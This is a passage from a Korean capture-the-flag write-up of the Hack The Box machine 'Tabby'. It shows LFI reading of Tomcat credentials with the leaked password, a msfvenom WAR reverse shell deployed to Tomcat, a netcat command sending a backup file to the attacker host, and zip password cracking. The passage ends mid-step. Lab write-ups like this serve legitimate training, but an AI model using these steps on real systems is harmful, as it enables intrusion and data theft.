본문 바로가기
Hack_ing

[HTB]Hack The Box - Tabby:: Write up

by Ate1es 2021. 12. 15.

1. reconnaissance

 

result of NMAP

22/tcp 80/tcp 8080/tcp

ssh, http, http(tomcat) 이 열려있는 것을 확인할 수 있다.

url-1 : 10.10.10.194:8080 -> tomcat port 로 접속하면, 

tomcat 기본페이지와 각종 설정파일의 경로가 나온다.

url-2 : http://10.10.10.194/

메인 페이지에서 "http://megahosting.htb/news.php?file=statement" 링크를 발견

칼리의 /etc/hosts 파일에 해당 호스트 추가 후 접속

파라미터 file에서 LFI 취약점 발생. 

위의 tomcat 페이지에 있던 /etc/tomcat9/tomcat-users.xml 파일 추출 시도 -- > 실패

tomcat9 의 tomcat-users.xml 경로 검색 -> /usr/share/tomcat9/etc/tomcat-users.xml 경로로 시도

tomcat 관리자 id(tomcat) password($3cureP4s5w0rd123!) 획득

위에서 얻은 로그인 정보를 가지고 tomcat 관리자 페이지 접속 --> 그러나 deploy 기능이 없어서 다음 진행으로 실패

curl와 tomcat remote deploy 이용해서 악성코드 업로드 시도

step1. msfvenom으로 악성코드 제작. 공격자-> 10.10.14.21:1234 

step2. 얻은 tomcat 계정 권한으로 tomcat 서버에 원격으로 deploy

/ate1es 경로로 shell.war 파일 원격 업로드 성공

step3. 업로드한 경로로 curl 요청 -> 업로드한 리버스쉘 실행. 및 리버스쉘 연결 성공

step4. pytho으로 쉘 업그레이드 후 정보가 될만한 파일 탐색 (/var/www/html) -> backup 파일 발견(16162020_backup.zip)

 

reverse_Shell : cat backup.zip | nc 10.10.14.21 1234

내 서버 쉘 : nc -nlvp 1234 > 16162020_backup.zip 

 

backup.zip 파일을 내 서버로 받아오는데 성공. 압축해제 하려 했으나 비밀번호가 걸려있었다.

step5. backup.zip 의 비밀번호 크랙 ( feat. johntheripper)

 

zip2john 명령어 사용 -> zip.john 파일로 변경후 툴 사용해 패스워드 크랙성공 ( password :